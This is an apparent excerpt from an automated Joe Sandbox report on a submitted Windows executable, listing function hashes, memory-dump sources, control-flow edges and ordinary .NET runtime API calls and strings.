                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdf8833cee21c139ef57a5bee3b8c50e71db7ac1327d835877ec4aba224b51aa
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B02BF75F0E6C687FA15AB2AAC512F8E6A1EF59794FD4463AC41D12360DF3CB580CE20
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 43a4ce6d3edcbc3c7c6dd526977bf27065133be5ff1af8be5729591fa77bad5d
                                                                                                                                                                                                                                                                                  • Instruction ID: 2f6aa8c7d95c6282af26816fc119d0186afb0cfbbd760836b54bb43d36cbe366
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43a4ce6d3edcbc3c7c6dd526977bf27065133be5ff1af8be5729591fa77bad5d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96F15D29F1DBC246F642FB25AD512F5E2A1EFA9344FD85336D44D513A2EF2C74D08A20

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: .NET BGC$@=}$BEGIN$condemned generation num: %d$m$qX
                                                                                                                                                                                                                                                                                  • API String ID: 0-3995759144
                                                                                                                                                                                                                                                                                  • Opcode ID: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
                                                                                                                                                                                                                                                                                  • Instruction ID: 9477399ca64bd25bf3ed19f7c2682a6b0d12b3d35d22517f7a61e40c78fb776c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE222765F0CAC282F611AF29AC452F4A3A0FF69754FD45235DA4E52362DF3CB5818B70

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                                                                                                                                                                                                                                                  • String ID: @$@$@
                                                                                                                                                                                                                                                                                  • API String ID: 2645093340-1177533131
                                                                                                                                                                                                                                                                                  • Opcode ID: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
                                                                                                                                                                                                                                                                                  • Instruction ID: dd8ae5ea1e2460e8f4c5ed3eea7a04661ab09918c0fb726024f2b2f0547ff716
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E74164327086D185EBB19F12E9443EAB7A5FB48B90F844235DE9D57B88CF3CD4468B10

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF72F5A474F,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5AB82B
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5B1460: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B146F
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5B1460: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14AD
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5B1460: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14D9
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5B1460: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14EA
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5B1460: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F5AB84A), ref: 00007FF72F5B14F9
• GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF72F5A474F,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5AB89D
• GetProcessAffinityMask.KERNEL32 ref: 00007FF72F5AB8B0
• QueryInformationJobObject.KERNEL32 ref: 00007FF72F5AB8FE
Strings
Memory Dump Source
• Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
Similarity
• API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
• String ID: PROCESSOR_COUNT
• API String ID: 1701933505-4048346908
• Opcode ID: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
• Instruction ID: 0a1fd428d77583d1d67347b0050a864ab42b6ba9be5421b91c2553f29e789b6e
• Opcode Fuzzy Hash: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
• Instruction Fuzzy Hash: FC317C21B09E8396EB54BB56DC903F9E3A1FF44784FC40036DA8E46695DE2CE519CFA0

Control-flow Graph

APIs
  • Part of subcall function 00007FF72F5AB820: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF72F5A474F,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5AB82B
  • Part of subcall function 00007FF72F5AB820: QueryInformationJobObject.KERNEL32 ref: 00007FF72F5AB8FE
  • Part of subcall function 00007FF72F5AB6C0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF72F5A4778,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5AB6D1
• RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5A48BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
Similarity
• API ID: AllocExceptionFailFastHandleInformationModuleObjectQueryRaise
• String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
• API String ID: 3403879507-2841289747
• Opcode ID: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
• Instruction ID: 9d6c58bc3758ef9e2e6115f95b89f8a6a71ce5db60e74c0078ab926b765107c2
• Opcode Fuzzy Hash: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
• Instruction Fuzzy Hash: 1E415E26B0A6C395E600BB62AD026F9E791FF41B84FC44071ED4D176A6CF2CE425CF60

Control-flow Graph

APIs
Strings
• Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF72F5A55E6
Memory Dump Source
• Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
Similarity
• API ID: ExceptionFailFastRaise$Sleep
• String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
• API String ID: 3706814929-926682358
• Opcode ID: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
• Instruction ID: 103e782eac3740ddacbc615841045e49e46c933402beeab31caa5e172a73435e
• Opcode Fuzzy Hash: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
• Instruction Fuzzy Hash: E941443AB1AA8686EB50EF16EC417A9B3A2FB48784FC44035DA4D43390DF3DE551CB60

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
Similarity
• API ID: Thread$CloseCreateHandlePriorityResume
• String ID:
• API String ID: 3633986771-0
• Opcode ID: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
• Instruction ID: 6645a9ad8b039b71dcea5577e435f71539fac495394f4fe67fc8f101813e15ac
• Opcode Fuzzy Hash: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
• Instruction Fuzzy Hash: 73E09BA5F0974242FB14AB21FC143B5A351FF99B95F8C4034CD5E56360EF3D91958B10

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 578 7ff72f5b0e30-7ff72f5b0e61 579 7ff72f5b0f1f-7ff72f5b0f3c GlobalMemoryStatusEx 578->579 580 7ff72f5b0e67-7ff72f5b0e82 GetCurrentProcess call 7ff72f60a95e 578->580 582 7ff72f5b0fc2-7ff72f5b0fc5 579->582 583 7ff72f5b0f42-7ff72f5b0f45 579->583 580->579 589 7ff72f5b0e88-7ff72f5b0e90 580->589 586 7ff72f5b0fc7-7ff72f5b0fcb 582->586 587 7ff72f5b0fce-7ff72f5b0fd1 582->587 584 7ff72f5b0fb1-7ff72f5b0fb4 583->584 585 7ff72f5b0f47-7ff72f5b0f52 583->585 592 7ff72f5b0fb6 584->592 593 7ff72f5b0fb9-7ff72f5b0fbc 584->593 590 7ff72f5b0f54-7ff72f5b0f59 585->590 591 7ff72f5b0f5b-7ff72f5b0f6c 585->591 586->587 594 7ff72f5b0fd3-7ff72f5b0fd8 587->594 595 7ff72f5b0fdb-7ff72f5b0fde 587->595 598 7ff72f5b0e92-7ff72f5b0e98 589->598 599 7ff72f5b0efa-7ff72f5b0eff 589->599 600 7ff72f5b0f70-7ff72f5b0f81 590->600 591->600 592->593 597 7ff72f5b0fe8-7ff72f5b100b call 7ff72f60acf0 593->597 601 7ff72f5b0fbe-7ff72f5b0fc0 593->601 594->595 596 7ff72f5b0fe0 595->596 595->597 602 7ff72f5b0fe5 596->602 603 7ff72f5b0ea1-7ff72f5b0eb5 598->603 604 7ff72f5b0e9a-7ff72f5b0e9f 598->604 608 7ff72f5b0f11-7ff72f5b0f14 599->608 609 7ff72f5b0f01-7ff72f5b0f04 599->609 606 7ff72f5b0f83-7ff72f5b0f88 600->606 607 7ff72f5b0f8a-7ff72f5b0f9e 600->607 601->602 602->597 610 7ff72f5b0eb9-7ff72f5b0eca 603->610 604->610 612 7ff72f5b0fa2-7ff72f5b0fae 606->612 607->612 608->597 615 7ff72f5b0f1a 608->615 613 7ff72f5b0f06-7ff72f5b0f09 609->613 614 7ff72f5b0f0b-7ff72f5b0f0e 609->614 616 7ff72f5b0ed3-7ff72f5b0ee7 610->616 617 7ff72f5b0ecc-7ff72f5b0ed1 610->617 612->584 613->608 614->608 615->602 618 7ff72f5b0eeb-7ff72f5b0ef7 616->618 617->618 618->599
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CurrentGlobalMemoryProcessStatus
                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                  • API String ID: 3261791682-2766056989
                                                                                                                                                                                                                                                                                  • Opcode ID: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
                                                                                                                                                                                                                                                                                  • Instruction ID: 4e11d36848e82700e4e047a1b2ec23ca8691be7bda7d0043adcf35a3c89e8de0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D541D361B1DB8641E9569A37D9113B9D252FF49FC0F58C231E90E66748FF3CE4818E20

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Count64Tick
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 1927824332-3414626797
                                                                                                                                                                                                                                                                                  • Opcode ID: 65d7cefa01567033c58624f5b2484fdd1bfa5fa806f089eb6f936ec28982fb97
                                                                                                                                                                                                                                                                                  • Instruction ID: b46178816f63107caa3af23cc9641d9c9e3a8fc8a14a79106bb2b99a623221d5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65d7cefa01567033c58624f5b2484fdd1bfa5fa806f089eb6f936ec28982fb97
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1412E25F0CAC686FA64BF26ED452F9A2A1EF08794FD54436D90D023E9DE3DE5418E20

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF72F5CF9D9,?,?,?,?,?,00007FF72F5DE9FF,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5E2360
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF72F5CF9D9,?,?,?,?,?,00007FF72F5DE9FF,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5E23D6
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF72F5CF9D9,?,?,?,?,?,00007FF72F5DE9FF,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5E242B
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF72F5CF9D9,?,?,?,?,?,00007FF72F5DE9FF,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5E2451
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
                                                                                                                                                                                                                                                                                  • Instruction ID: 981dfbb4b5a4b397d42db498aee0b296bd10e62c50f624c8a35fb2395e94868d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04317F25F0CAD282EA20BF16EC403F5A790FF68794FD80035D98C46699DE7CE5858B71

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF72F5B51C8,?,?,0000000A,00007FF72F5B4220,?,?,00000000,00007FF72F5ADBB1), ref: 00007FF72F5B1707
                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF72F5B51C8,?,?,0000000A,00007FF72F5B4220,?,?,00000000,00007FF72F5ADBB1), ref: 00007FF72F5B1727
                                                                                                                                                                                                                                                                                  • VirtualAllocExNuma.KERNEL32 ref: 00007FF72F5B1748
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual$CurrentNumaProcess
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 647533253-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
                                                                                                                                                                                                                                                                                  • Instruction ID: aa692986196deed2883d7b1ec9d12afbffb0408f9d286037ead558a9f7a19327
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86F0AF71B086D182EB209B06F800269A761FB49BD4F984138EF8C17B58CF3DD5918B10

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5E2480: EnterCriticalSection.KERNEL32(?,?,?,00007FF72F5C7A69), ref: 00007FF72F5E24C4
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5E2480: LeaveCriticalSection.KERNEL32(?,?,?,00007FF72F5C7A69), ref: 00007FF72F5E24EE
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 00007FF72F5C7B43
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 00007FF72F5C7B64
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
